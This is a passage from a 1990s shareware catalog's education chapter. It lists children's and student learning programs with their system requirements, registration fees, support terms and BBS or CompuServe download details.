Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited BBS, CompuServe, mail support; lifetime + return policy; bonus graphics; all ASP-wide offers (see + page 6). Lifetime free upgrading allowed. + Look for: AMD30.ZIP on BBSs (call 512-258-0571 to download it at + no charge); AMD30.ZIP on CompuServe in CIS:EDFORUM forum + LIBrary 2 (or contact userID 72740,1326 for assistance). + Download size: 524k (about 39 minutes with a 2400 baud modem) + Description: + st rd + Primarily for children from 1 through 3 grades. Based on + the multiplication tables from 1 to 10, it teaches "mental + math" in a fun way. Progressive help is given as needed. + Rewards for successful completion of ten problems include + several build-and-color you own animations (dinosaurs, cars, + face, and fashion model). From FLIX Productions - the winner of + both the Shareware Industry Award and Ziff Davis Shareware + award. + + + Product: Animated Clock + Author: FLIX Productions + Version: 3.0 (05-12-94) + Needs: IBM PC, DOS 3.3 or better. 500k RAM; EGA monitor; Hard + disk. + Registration fee: $8.00 (add $1.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited BBS, CompuServe, mail support; lifetime + return policy; bonus graphics; all ASP-wide offers (see + page 6). Lifetime free upgrading allowed. + Look for: ACLOCK30.ZIP on BBSs (call 512-258-0571 to download it + at no charge); ACLOC3.ZIP on CompuServe in CIS:EDFORUM forum + LIBrary 2 (or contact userID 72740,1326 for assistance). + Download size: 321k (about 24 minutes with a 2400 baud modem) + Description: + A program for children from pre-K through third grade that + teaches important time skills involving analog and digital + clocks. Various levels and context sensitive help are provided. + Animated rewards pop out of the doors of the cuckoo clock, and + + Chapter 13, "Education" 503 + + + + ten correct answers gets a full-screen silly cartoon. Winner of + the Shareware Industry Award for "Best Educational Software". + + + Product: Animated Math + Author: FLIX Productions + Version: 1.0 (02-15-91) + Needs: IBM PC, DOS 3.3 or better. 500k RAM; EGA monitor; Hard + disk. + Registration fee: $10.00 (add $1.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited BBS, CompuServe, mail support; lifetime + return policy; bonus graphics; all ASP-wide offers (see + page 6). Lifetime free upgrading allowed. + Look for: AMATH10.ZIP on BBSs (call 512-258-0571 to download it + at no charge); AMATH1.ZIP on CompuServe in CIS:EDFORUM forum + LIBrary 2 (or contact userID 72740,1326 for assistance). + Download size: 306k (about 23 minutes with a 2400 baud modem) + Description: + Teaches counting, addition and subtraction using animation. For + children from Pre-K through first grade. Single digit problems + covered. Animated rewards are given each step of the way - not + just a "wrong" response from the computer. Rewards include + dinosaur connect-the-dots, color games, build your own rocket, + and animated piano, and more. Winner of the Shareware Industry + Award for "Best Educational Software". + + + Product: Animated Memory Game + Author: FLIX Productions + Version: 3.0 (05-12-94) + Needs: IBM PC, DOS 3.3 or better. 500k RAM; EGA monitor; Hard + disk. + Registration fee: $6.00 (add $1.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited BBS, CompuServe, mail support; lifetime + return policy; bonus graphics; all ASP-wide offers (see + page 6). Lifetime free upgrading allowed. + Look for: AMEM30.ZIP on BBSs (call 512-258-0571 to download it at + no charge); AMEM3.ZIP on CompuServe in CIS:EDFORUM forum + LIBrary 2 (or contact userID 72740,1326 for assistance). + Download size: 237k (about 18 minutes with a 2400 baud modem) + Description: + Uses 30 animated sequences to test memory skills. By matching + hidden pictures in pairs you win the game and get animated + rewards. Many options are provided: selecting from 14 different + tile backgrounds, a mini-movie theater, and more. Various + difficulty levels provide challenges for all ages. Winner of + the Shareware Industry Award for "Best Educational Software". + + Chapter 13, "Education" 504 + + + + Product: Animated Money + Author: FLIX Productions + Version: 1.0 (05-12-94) + Needs: IBM PC, DOS 3.3 or better. 500k RAM; VGA monitor; Hard + disk. + Strongly recommended: sound card. + Registration fee: $15.00 (add $1.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited BBS, CompuServe, mail support; lifetime + return policy; bonus graphics; all ASP-wide offers (see + page 6). Lifetime free upgrading allowed. + Look for: AMON1?.ZIP on BBSs (call 512-258-0571 to download it at + no charge); AMON1*.ZIP on CompuServe in CIS:EDFORUM forum + LIBrary 2 (or contact userID 72740,1326 for assistance). + Download size: 1376k (about 102 minutes with a 2400 baud modem) + Description: + Teaches coin recognition and math skills using US and Canadian + coins. The coins are scanned to be highly recognizable. Three + types of games are provided: coin recognition and adjustable + level matching games (coins to amounts and coins to coins). 10 + matches earn a ticket to a movie featuring stop-motion + animation. Sound effects and speech supported for virtually all + devices. From FLIX Productions, winner of both the Shareware + Industry Award and Ziff Davis Shareware Award. + + + Product: Animated VGA Memory Game + Author: FLIX Productions + Version: 1.0 (05-12-94) + Needs: IBM PC, DOS 3.3 or better. 500k RAM. + Strongly recommended: SVGA monitor; Hard disk; sound card. + Registration fee: $10.00 (add $1.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited BBS, CompuServe, mail support; lifetime + return policy; bonus graphics; all ASP-wide offers (see + page 6). Lifetime free upgrading allowed. + Look for: AMEMV10.ZIP on BBSs (call 512-258-0571 to download it + at no charge); AMV1.ZIP on CompuServe in CIS:EDFORUM forum + LIBrary 2 (or contact userID 72740,1326 for assistance). + Download size: 752k (about 56 minutes with a 2400 baud modem) + Description: + SVGA and sound support are provided in this version of a + concentration type game. All kinds of animation are used + including: clay, stop-motion, morphing, tweening, 3D, cell and + full-motion video. up to 640 tiles can be used in SVGA mode (10 + to 20 in VGA). One or two player mode, and a welath of other + options. Winner of Ziff Davis Shareware Award from Computer + Gaming Magazine for "Best Puzzle Game". + + Chapter 13, "Education" 505 + + + + Product: Animated Words + Author: FLIX Productions + Version: 3.0 (05-12-94) + Needs: IBM PC, DOS 3.3 or better. 500k RAM; EGA monitor; Hard + disk. + Strongly recommended: sound card. + Registration fee: $12.00 (add $1.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited BBS, CompuServe, mail support; lifetime + return policy; bonus graphics; all ASP-wide offers (see + page 6). Lifetime free upgrading allowed. + Look for: AWORDS30.ZIP on BBSs (call 512-258-0571 to download it + at no charge); AWORD3.ZIP on CompuServe in CIS:EDFORUM forum + LIBrary 2 (or contact userID 72740,1326 for assistance). + Download size: 680k (about 51 minutes with a 2400 baud modem) + Description: + Animated Words is a spelling program for children from pre-K + through first grade. The child is helped to match the word with + it's picture. When the word is correctly matched, pieces are + added to a puzzle; after five correct answers the puzzle + becomes animated. The program is enhanced with digitized speech + for the PC Speaker or SoundBlaster. Winner of the Shareware + Industry Award for "Best Educational Software". + + + Product: Brandon's Big Lunchbox + Educational fun for kids 3 - 7! See full description on + page 499. + + Product: Brandon's Preschool Graphics Lu + Graphics and sound, learning for preschoolers. See full + description on page 499. + + Product: Card Flash + Card flash. See full description on page 517. + + Product: Color Fun + Kids' game. See full description on page 500. + + Chapter 13, "Education" 506 + + + + Product: CULTURAL AWARENESS + Author: Awareness Productions, 214-517-0279 + Version: 1.13 (05-04-94) + Needs: IBM PC, DOS 3.0 or better. 256k RAM; Hard disk. + Registration fee: $20.00 (add $1.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited mail support; 1-month return policy; bonus + data; all ASP-wide offers (see page 6); disks of other + shareware. + Look for: AWARE113.ZIP on BBSs (call 214-690-2168 to download it + at no charge). + Download size: 182k (about 14 minutes with a 2400 baud modem) + Description: + Educational game to test and improve your child's "cultural + literacy." Two levels of play. At Novice level, the game is + suitable for students sixth grade and up. At advanced level, + the game is a challenge for adults! Topics include proverbs, + idioms, grammar, children's literature, mythology, music, art, + philosophy, the Bible, world religions, American history & + geography, world history & geography, science & technology, + medicine, and mathematics. + + + Product: DOC DEFIANT + An original board game similar to Backgammon. See full + description on page 683. + + Product: Edwin Basic Math Add/Subtract + Author: Edwin Educational Software, 516-423-3817 + Version: 3.00 (06-01-93) + Needs: IBM AT (80286), Windows 3.1 or better. 2000k RAM; VGA + monitor; Mouse. + Strongly recommended: Hard disk. + Registration fee: $15.00 (add $5.00 for shipping to U.S. + addresses) (add $6.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); 3 months of unlimited + CompuServe, mail support; all ASP-wide offers (see page 6); + disks of other shareware. Documented course of study. Bonus + tutorial. + Look for: availability unknown on BBSs; EDAM03.ZIP on CompuServe + in CIS:EDFORUM forum LIBrary 0 (or contact userID 70322,2163 + for assistance). + Download size: 340k (about 25 minutes with a 2400 baud modem) + Description: + A tutorial/drill in addition and subtraction. Levels continue + to 999+999+999 and 9999-9999, including full support for + borrowing and carry concepts. Graphics and simple reward + animation are included. A full course of study is available + explained in the documentation. Standardized testing format is + included. + + Chapter 13, "Education" 507 + + + + Product: EGA Mouse Paint + Author: Fischer Grafix & Software, 714-898-7262 + Version: 5.0 (10-29-93) + Needs: IBM PC, DOS 3.3 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; EGA + monitor; Mouse. + Strongly recommended: HP LaserJet printer. + Registration fee: $18.50 (add $2.50 for shipping to U.S. + addresses) (add $2.50 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, CompuServe support; bonus + utilities; discounts on other products. + Look for: EGAMP.ZIP on BBSs; EGAMP.ZIP on CompuServe in + CIS:IBMAPP forum LIBrary 11 (or contact userID 70233,1315 for + assistance). + Download size: 194k (about 15 minutes with a 2400 baud modem) + Description: + If your kids like to color then they will enjoy using the mouse + to color in any of over 40 pre-made picture. There are two + pallettes of colors and patterns to select from, over 60. + Selecting a picture and coloring it in is as easy as point and + click. An additional feature is the arrow draw program which + allows you to create and color your own drawings. Also includes + talking menus for the smaller children. + + + Product: Equatron + Beat the computer at solving the equation. See full + description on page 677. + + Product: HANG4.ZIP + 100% user configureable hangman. 256 colors! See full + description on page 705. + + Product: Math Bingo + Author: LatticeWork Software + Version: 1.1 (10-26-94) + Needs: IBM AT (80286), Windows 3.1 or better. VGA monitor; Hard + disk; Mouse. + Strongly recommended: sound card. + Registration fee: $9.95 (add $4.00 for shipping outside U.S. or + Canada) + Registration benefits: 12 months of CompuServe, mail support; + 3-month limited return policy. + Look for: availability unknown on BBSs; MBINGO.ZIP on CompuServe + in CIS:WINFUN forum LIBrary 14 (or contact userID 74453,2112 + for assistance). + Download size: 344k (about 26 minutes with a 2400 baud modem) + Description: + Your child will easily learn math facts while having fun + playing bingo, in an easy-to-use program which teaches math in + a non-drill way. It is geared to kids; they learn without + realizing that they are learning. Create voice overlays, and + + Chapter 13, "Education" 508 + + + + hear yourself or your child as the patient instructor. For one + or two players. Program designer has a graduate degree in + Psychology. Included are a full on-line help, the option to + turn voices on and off, and to change the speed of the game. + + + Product: MATH CHALLENGE + Author: Just For Me Software, Inc., 810-348-6697 + Version: 2.0 (03-01-94) + Needs: IBM PC, DOS 3.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; VGA + monitor. + Strongly recommended: Hard disk; Mouse. + Registration fee: $16.95 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, CompuServe, mail + support; lifetime return policy; all ASP-wide offers (see + page 6); disks of other shareware. + Look for: availability unknown on BBSs; MATHCH.EXE on CompuServe + in CIS:EDFORUM forum LIBrary 2 (or contact userID 71150,1305 + for assistance). + SWREG#: 1988 + Download size: 350k (about 26 minutes with a 2400 baud modem) + Description: + An educational game that encourages your children to learn + their math tables with personalized text, colorful animation, + interesting sound effects, and photographic images. Also + provides parent with options to select subject and difficulty + levels. Can be used in practice/learning or in timed testing + modes. + + + Product: Math Rescue #1 + Practice math with a scrolling arcade game. See full + description on page 666. + + Chapter 13, "Education" 509 + + + + Product: MathCounts 1+2 + Author: Able Art Software, 604-229-4766 + Version: 1.2 (01-07-94) + Needs: IBM PC, DOS 3.0 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; EGA monitor; Hercules monitor. + Registration fee: $29.95 (add $3.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of phone, mail support; discounts on + other products. + Look for: MC12V12.ZIP on BBSs (multiple files); MC1212.ZIP on + CompuServe in CIS:IBMAPP forum LIBrary 11 (or contact userID + 71431,1673 for assistance). + SWREG#: 819 + Download size: 90k (about seven minutes with a 2400 baud modem) + Description: + st nd + A graphics-based 1 and 2 grade math tutorial, covers + counting, addition, subtraction, multiplication, fractions, + telling time, word problems, place value, and more. Instructive + feedback and positive reinforcement. Difficulty levels chosen + automatically or by instructor. Keeps track of student's + progress. Can be customized with friends' names in word + problems. + + + Product: MathCounts 3+4 + Author: Able Art Software, 604-229-4766 + Version: 1.2 (01-07-94) + Needs: IBM PC, DOS 3.0 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; EGA monitor; Hercules monitor. + Registration fee: $29.95 (add $3.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of phone, mail support; discounts on + other products. + Look for: MC34V12.ZIP on BBSs (multiple files); MC3412.ZIP on + CompuServe in CIS:IBMAPP forum LIBrary 11 (or contact userID + 71431,1673 for assistance). + SWREG#: 820 + Download size: 115k (about nine minutes with a 2400 baud modem) + Description: + rd th + A graphics-based 3 and 4 grade math tutorial, covers + addition, subtraction, multiplication, division, estimation, + fractions, decimals, word problems, and more! Instructive + feedback and positive reinforcement. Context-sensitive remedial + work, automatic beginner's mode. Keeps track of student's + progress. Can be customized. + + Chapter 13, "Education" 510 + + + + Product: Melissa's Music Flashcards + Music flashcards that are fun. See full description on + page 632. + + Product: MERLIN'S MATH + Author: Awareness Productions, 214-517-0279 + Version: 1.03 (05-04-94) + Needs: IBM AT (80286), DOS 3.0 or better. 512k RAM; VGA monitor; + Mouse. + Registration fee: $18.00 (add $1.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited mail support; 1-month return policy; all + ASP-wide offers (see page 6); disks of other shareware. + Look for: MERLN103.ZIP on BBSs (call 214-690-2168 to download it + at no charge). + Download size: 175k (about 13 minutes with a 2400 baud modem) + Description: + Episodes 1 & 2 teach the mechanics of multiplying multiple + digit numbers, up to 5 by 5 digits, and long division. Starting + as an apprentice magician, the student gains in power by + solving math problems of increasing difficulty, all the time + racing against a dripping water clock. Points are awarded on + the basis of speed, accuracy, and difficulty level of problem. + + + Product: Mouse Math [***] + A whimsical verbal math drill program. See full description on + page 532. + + Product: A MUSICAL TUTORIAL + An excellent way to promote musical study. See full + description on page 542. + + Product: A MUSICAL TUTORIAL for Windows + An excellent way to promote musical study. See full + description on page 543. + + Chapter 13, "Education" 511 + + + + Product: SUNDAY SCHOOL COLORS + Author: Randall Alaimo + Version: 3.7 (05-15-93) + Needs: IBM PC, DOS 3.0 or better. 128k RAM; EGA monitor; Hard + disk; Mouse. + Registration fee: $15.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, mail support; 3-month + return policy; all ASP-wide offers (see page 6); disks of other + shareware. Bonus pictures. + Look for: SUNDAY.ZIP on BBSs (call 503-236-3266 to download it at + no charge). + Download size: 118k (about nine minutes with a 2400 baud modem) + Description: + A fun coloring game for children ages 3-13. Soundblaster sound + is optional. Kids have fun with coloring and sound effects, + while learning bible truths. The pictures are of high quality + in high resolution (640X350) format. The sound is of high + quality too. PC speaker users hear sirens, tones, buzzes and + more. Soundblaster users hear bells, organ, harps, and more. + + + Product: Teach Your Children + Author: Q&D Software Development, 201-635-1824 + Version: 2.0 (02-06-95) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM; VGA monitor; + VBRUN300.DLL. + Registration fee: $19.95 (add $3.95 for shipping to U.S. + addresses) (add $4.95 for shipping to Canadian addresses) (add + $4.95 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); 51/4" master disk(s); lifetime unlimited phone, + CompuServe, mail support; bonus utilities; bonus data; all ASP- + wide offers (see page 6). Lifetime free upgrading allowed. 99 + free update disk(s) sent out. + Look for: TYC2_0.ZIP on BBSs; TYC.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 0 (or contact userID 76336,3271 for + assistance). + SWREG#: 3164 + PsL#: 11793 + Download size: 800k (about 60 minutes with a 2400 baud modem) + Description: + Makes learning math and reading fun for you and your child with + visual and audio reinforcement. Sound card not required! + Assists with addition, subtraction, and multiplication, as well + as spelling and word recognition. Various levels for varying + abilities. Lets you record your child's progress unobtrusively + and view results via printed and/or on-screen reports. Handy + on-screen pointers guide you and your child every step of the + way. Includes on-line context sensitive help system. + + Chapter 13, "Education" 512 + + + + Product: Treasure Hunt Math + Author: Adventure LearningWare, 408-224-5519 + Version: 1.2 (02-12-93) + Needs: IBM PC, DOS 2.1 or better. EGA monitor. + Registration fee: $19.95 + Registration benefits: Printed manual, master disks, bonus game, + unlimited newsletter support. + Look for: THMATH.ZIP on BBSs (call 415-323-4398 to download it at + no charge); THMATH.ZIP on CompuServe in CIS:IBMAPP forum + LIBrary 11 (or contact userID 71332,3605 for assistance); + THMATH.ZIP on GEnie in IBMPC forum LIBrary 15 (or contact + userID XKY12927 for assistance). + Download size: 199k (about 15 minutes with a 2400 baud modem) + Description: + Elementary math (grades 1-6) in arcade-style game for home and + school. Exciting EGA animation and sound hold user's interest. + Basic math operations (+,-,x,:), fractions and decimals (1000+ + math facts). Solve, find missing factor or study modes. Prints + certificates of achievement, scoreboards and math tests on dot- + matrix and LaserJet printers. Record keeping to track student's + progress. "Smart" editor lets you add or customize math + problems. School lab packs and site licenses available. + + + Product: U.S. Geography Tutor + Geography testing/teaching Windows program. See full + description on page 537. + + Product: WinFlash + Author: Open Windows, 719-531-0403 + Version: 3.0 (12-21-93) + Needs: IBM AT (80286), Windows 3.1 or better. 512k RAM; VGA + monitor; Hard disk. Any ASCII text editor. + Strongly recommended: Mouse. + Registration fee: $19.95 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $3.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 6 + months of CompuServe, mail support; lifetime return policy; + bonus utilities; disks of other shareware. 12-month free + upgrading allowed. + Look for: FLASH_30.ZIP on BBSs (call 703-680-9269 to download it + at no charge); FLASH.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 10 (or contact userID 75236,3243 for assistance). + Download size: 162k (about twelve minutes with a 2400 baud modem) + Awards & nominations: 1994 finalist, PC Magazine/Ziff-Davis + Interactive Shareware Awards. 1994 finalist, Shareware + Industry Awards. + Description: + Adds TrueType fonts, colors, .BMP graphics, .WAV sounds and a + new "Priority Questions From History" mode which customizes the + selection of questions to focus on those not yet learned. Easy + for children to use - no computer experience needed. Memorize + coursework or professional material fast! + + Chapter 13, "Education" 513 + + + + Product: Word Rescue #1 + Scrolling arcade game that teaches reading. See full + description on page 668. + + Product: Z & Z Color [***] + Color-by-number for ages 3 and up. See full description on + page 501. + + Product: Z & Z Puzzle [***] + Author: Z & Z Software, 410-561-3891 + Version: 1.0 (09-01-95) + Needs: IBM AT (80286), Windows 3.1 or better. 2000k RAM; Hard + disk; Mouse. + Strongly recommended: sound card. + Registration fee: $15.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); 6 months of unlimited phone, CompuServe, mail support; + bonus data; all ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; ZZPUZZ.ZIP on CompuServe + in CIS:WINFUN forum LIBrary 12 (or contact userID 76021,2256 + for assistance). + SWREG#: 7251 + PsL#: 14173 + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + A Windows combination slider and jigsaw puzzle for ages 4 and + above. Helps to improve problem solving skills. Contains many + options including the unique twist of having the pieces colored + in only when they are in their correct locations. Prize is + awarded upon successful completion of each puzzle. + + + Product: Zpeller + Improves spelling & vocabulary skills. See full description on + page 548. + + + 13.3 Junior high + + Product: ACCU Music System + Create music that can be played, printed, etc. See full + description on page 628. + + Product: Card Flash + Card flash. See full description on page 517. + + Product: Crossdown for Windows + Solve and construct puzzles in Windows. See full description + on page 708. + + Chapter 13, "Education" 514 + + + + Product: Ecomaster + Ecology simulation for 1 or 2 players. See full description on + page 544. + + Product: ETCAI Electronics Instruction + Electronics learning and training system. See full description + on page 520. + + Product: HANG4.ZIP + 100% user configureable hangman. 256 colors! See full + description on page 705. + + Product: Math Rescue #1 + Practice math with a scrolling arcade game. See full + description on page 666. + + Product: Mouse Math [***] + A whimsical verbal math drill program. See full description on + page 532. + + Product: PHRASE.ZIP + Combo hangman & wheel of fortune. New concept. See full + description on page 706. + + Product: PoeTrio + Author: Chatfield Software, Inc., 216-632-5447 + Version: 1.0 (04-07-91) + Needs: IBM PC, DOS 2.11 or better. 240k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $20.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited tollfree 800# phone, fax, CompuServe, GEnie, + newsletter, mail support; 1-month return policy; all ASP-wide + offers (see page 6); discounts on other products; discounts on + upgrades. 10% discount on other Chatfield Software products; + free bonus disk. + Look for: CSPT.ZIP on BBSs; CSPT.ZIP on CompuServe in CIS:IBMAPPS + forum LIBrary 0 (or contact userID 71031,1036 for assistance); + CSPT.ZIP on GEnie in IBMPC forum LIBrary 0. + Download size: 131k (about ten minutes with a 2400 baud modem) + Description: + Derives its name from the fact that it is a trio of educational + poetry programs: one for free verse (CATALYST); one for + syllabics (HAIKUKU); and one for an original verseform called + the CANTONA. Each of the three programs has its own verse + editor. + + + Product: Teach Your Children + Helps kids have fun learning math and reading. See full + description on page 511. + + Chapter 13, "Education" 515 + + + + Product: U.S. Geography Tutor + Geography testing/teaching Windows program. See full + description on page 537. + + Product: WinGraph + Cartesian (2D & 3D) & polar equation grapher. See full + description on page 444. + + Product: XYSee + Mid/Hi-school visual math for Windows & DOS. See full + description on page 445. + + Product: Zpeller + Improves spelling & vocabulary skills. See full description on + page 548. + + + 13.4 High school + + Product: ACCU Music System + Create music that can be played, printed, etc. See full + description on page 628. + + Product: BTS-Equalizer + Author: Nine-Patch Software, 816-582-8589 + Version: 1.9 (02-24-94) + Needs: IBM PC, DOS 3.0 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Dual 720k floppy drives; Hard disk; Epson + printer. + Registration fee: $19.95 + Registration benefits: choice of 31/2" or 51/4" master disk(s); 12 + months of phone, CompuServe, mail support; 12-month return + policy; discounts on upgrades. 1-month free upgrading allowed. + 1 free update disk(s) sent out. + Look for: NPBT19.ZIP on BBSs; NPBT19.EXE on CompuServe in + CIS:EDFORUM forum LIBrary 2 (or contact userID 71222,3565 for + assistance). + Download size: 205k (about 15 minutes with a 2400 baud modem) + Description: + Students, parents and teachers write instructional question + files for review, remediation, makeup, games, tests and + assessments. Edit, share, compete and trade the files on + paper, disk and BBS. Operate a question file exchange in your + class or school. "Beat the system" in any subject. Change + from passive pupil to self-correcting scholar. Think at + several levels. BBS sysops: run a "home school" based on + subscribers' school assignments. + + Chapter 13, "Education" 516 + + + + Product: Card Flash + Author: Burnham Park Software, Inc., 312-922-6313 + Version: 1.0 (11-21-94) + Needs: IBM 80386, Windows 3.1 or better. 1024k RAM; EGA monitor; + Hard disk. + Strongly recommended: VGA monitor; sound card. + Registration fee: $12.00 (add $1.00 for shipping to Canadian + addresses) (add $3.00 for shipping outside U.S. or Canada) + Registration benefits: lifetime unlimited phone, BBS, CompuServe, + mail support; bonus data; all ASP-wide offers (see page 6); + discounts on other products; discounts on upgrades. Lifetime + free upgrading allowed. + Look for: CFLASH10.ZIP on BBSs (call 312-922-2839 to download it + at no charge); CFLAS*.ZIP on CompuServe in CIS:WINFUN forum + LIBrary 15 (or contact userID 71532,3271 for assistance). + Download size: 152k (about twelve minutes with a 2400 baud modem) + Description: + A Windows flash card program that aids with learning and + memorization. Multimedia flash cards may be created and + virtually any topic may be used. On-line help. + + + Product: Crossdown + Solve, construct and print crossword puzzles. See full + description on page 707. + + Product: Crossdown for Windows + Solve and construct puzzles in Windows. See full description + on page 708. + + Product: Enigmacross + Solve and construct acrostic puzzles. See full description on + page 709. + + Product: ETCAI Electronics Instruction + Electronics learning and training system. See full description + on page 520. + + Product: FDplot + Function and data plot w/error-bars. See full description on + page 448. + + Product: Fictionary + The game of fantastic/farfetched definitions. See full + description on page 704. + + Product: HANG4.ZIP + 100% user configureable hangman. 256 colors! See full + description on page 705. + + Product: THE MAGIC OF THE MIND + Contentious philosophy of human behavior. See full description + on page 662. + + Chapter 13, "Education" 517 + + + + Product: Math Rescue #1 + Practice math with a scrolling arcade game. See full + description on page 666. + + Product: Mathplot + Mathematical function plotting program. See full description + on page 448. + + Product: PC-ECAP + Linear circuit analysis program with graphics. See full + description on page 407. + + Product: Periodic Table + Electronic table of elements with decay data. See full + description on page 546. + + Product: PoeTrio + Three poetry tutorials with separate editors. See full + description on page 514. + + Product: POETRY STAR + Author: Chatfield Software, Inc., 216-632-5447 + Version: 1.1 (03-15-92) + Needs: IBM PC, DOS 2.11 or better. 240k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Dual 720k floppy drives. + Registration fee: $25.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited tollfree 800# phone, fax, + CompuServe, GEnie, newsletter, mail support; 1-month return + policy; all ASP-wide offers (see page 6); discounts on other + products; discounts on upgrades. Free writers' tip-sheets; 10% + discount on other Chatfield Software products; FREE bonus disk. + Look for: CSPS.ZIP on BBSs; CSPS.ZIP on CompuServe in CIS:IBMAPPS + forum LIBrary 1 (or contact userID 71031,1036 for assistance); + CSPS.ZIP on GEnie in IBMPC forum LIBrary 0. + Download size: 124k (about nine minutes with a 2400 baud modem) + Description: + A highly interactive tutor for contemporary poetry writing + which approaches the subject of poetry writing from the + perspective of discovery and delight, the way poets approach + it. Leads you step by step into a wacky, joyful new world where + verbal imagination reigns supreme. It is written in the + Artficial Intelligence language INRAC, which makes it possible + for you to communicate with the program in standard English. + + + Product: Q&A Study Aid [***] + Comprehensive computer testing/grading system. See full + description on page 376. + + Chapter 13, "Education" 518 + + + + Product: Spanish Helper Level One + Interactive program to learn Spanish. See full description on + page 536. + + Product: TRAINER + Scores tests free-choice and forced-choice. See full + description on page 527. + + Product: WinFlash + Windows flash card program. See full description on page 512. + + Product: WinGraph + Cartesian (2D & 3D) & polar equation grapher. See full + description on page 444. + + Product: XYSee + Mid/Hi-school visual math for Windows & DOS. See full + description on page 445. + + Product: Zpeller + Improves spelling & vocabulary skills. See full description on + page 548. + + + 13.5 College + + Product: BESTHES + Pop-up ultrafast 3,056,200-word thesaurus. See full + description on page 242. + + Product: BTS-Equalizer + Tutor and study aid, question file exchange. See full + description on page 515. + + Product: BUDDY: A Tutorial Companion + Eight-lesson AI tutorial for clearer writing. See full + description on page 251. + + Product: Card Flash + Card flash. See full description on page 515. + + Product: CHRONOS + Interactive historical timelines. See full description on + page 538. + + Product: Crossdown + Solve, construct and print crossword puzzles. See full + description on page 707. + + Product: Enigmacross + Solve and construct acrostic puzzles. See full description on + page 709. + + Chapter 13, "Education" 519 + + + + Product: ETCAI Electronics Instruction + Author: ETCAI Products, 601-497-2566 + Version: 1.24 (07-15-93) + Needs: IBM PC, DOS 3.3 or better. 512k RAM; EGA monitor; + Hercules monitor; Hard disk. + Strongly recommended: Mouse. + Registration fee: $41.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of phone, mail support; 1-month return + policy; all ASP-wide offers (see page 6). 3-month free + upgrading allowed. + Look for: availability unknown on BBSs. + Download size: 600k (about 45 minutes with a 2400 baud modem) + Description: + A training system for electrical and electronics education. + Consist of 31 exercises, some of which have several variations. + Operates within a seamless shell in which users select options + using pull-down menus and "push buttons". All data entry is via + full screen editing. Topics covered include DC circuits, AC + circuits, digital principles, and transistors. Extensive + graphics are used in both analysis and troubleshooting + exercises. User work is graded immediately. + + + Product: FDplot + Function and data plot w/error-bars. See full description on + page 448. + + Product: Fictionary + The game of fantastic/farfetched definitions. See full + description on page 704. + + Product: HANG4.ZIP + 100% user configureable hangman. 256 colors! See full + description on page 705. + + Product: LEADING AND MANAGING OTHERS + A multimedia seminar on disk: leaders & mgrs. See full + description on page 376. + + Product: Lecture + Displays text-based slide show lectures. See full description + on page 377. + + Product: THE MAGIC OF THE MIND + Contentious philosophy of human behavior. See full description + on page 662. + + Product: PC-ECAP + Linear circuit analysis program with graphics. See full + description on page 407. + + Chapter 13, "Education" 520 + + + + Product: Periodic Table + Electronic table of elements with decay data. See full + description on page 546. + + Product: PowerBatch + Batch file replacement creates compiled pgms. See full + description on page 130. + + Product: Q&A Study Aid [***] + Comprehensive computer testing/grading system. See full + description on page 376. + + Product: Scholar Utilities + Aids writers of scholarly papers. See full description on + page 549. + + Product: Spanish Helper Level One + Interactive program to learn Spanish. See full description on + page 536. + + Product: TRAINER + Scores tests free-choice and forced-choice. See full + description on page 527. + + Product: WinFlash + Windows flash card program. See full description on page 512. + + Product: XYSee + Mid/Hi-school visual math for Windows & DOS. See full + description on page 445. + + Product: Zpeller + Improves spelling & vocabulary skills. See full description on + page 548. + + + 13.6 Library/bibliography + + See also: Business, Specific-field 